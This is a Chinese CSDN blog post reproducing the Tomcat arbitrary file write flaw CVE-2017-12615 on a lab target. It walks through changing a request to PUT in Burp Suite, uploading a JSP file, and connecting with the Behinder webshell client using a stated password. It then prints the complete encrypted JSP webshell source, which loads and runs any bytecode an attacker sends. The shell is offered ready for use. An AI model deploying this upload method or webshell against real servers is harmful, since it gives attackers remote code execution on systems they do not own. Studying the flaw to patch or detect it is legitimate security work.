Tomcat 任意文件写入漏洞 CVE-2017-12615

本文介绍了如何利用Burp Suite将GET请求转换为PUT请求,并在目标网站上传一个JSP一句话木马。通过设置请求类型、构造数据包并利用冰蝎工具进行连接验证,成功创建了文件并执行了木马。这个过程揭示了Web应用程序可能面临的注入攻击风险。
摘要由CSDN通过智能技术生成

复现过程

靶场版本:Tomcat 8.5.19

在这里插入图片描述

1. 打开burp,访问目标网站。

这时,burp成功抓到数据包。

在这里插入图片描述
可以看到,这是一个GET请求,并且没有数据。我们需要的是PUT请求。

2. 右键,Repeater。修改传类型为 PUT ,生成的文件名为 test-001.jsp 。接着将 jsp 的一句话木马写入数据块中,放包。Response 返回 201(文件创建成功)。

在这里插入图片描述

3. 上冰蝎,直接连接,密码为 rebeyond

在这里插入图片描述
在这里插入图片描述
OK,连接成功

附上 jsp 一句话木马:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{
	U(ClassLoader c){
	super(c);
	}
	public Class g(byte []b){
		return super.defineClass(b,0,b.length);
	}
}%>
<%if (request.getMethod().equals("POST")){
	String k="e45e329feb5d925b";
	session.putValue("u",k);
	Cipher c=Cipher.getInstance("AES");
	c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
	new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}%>
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值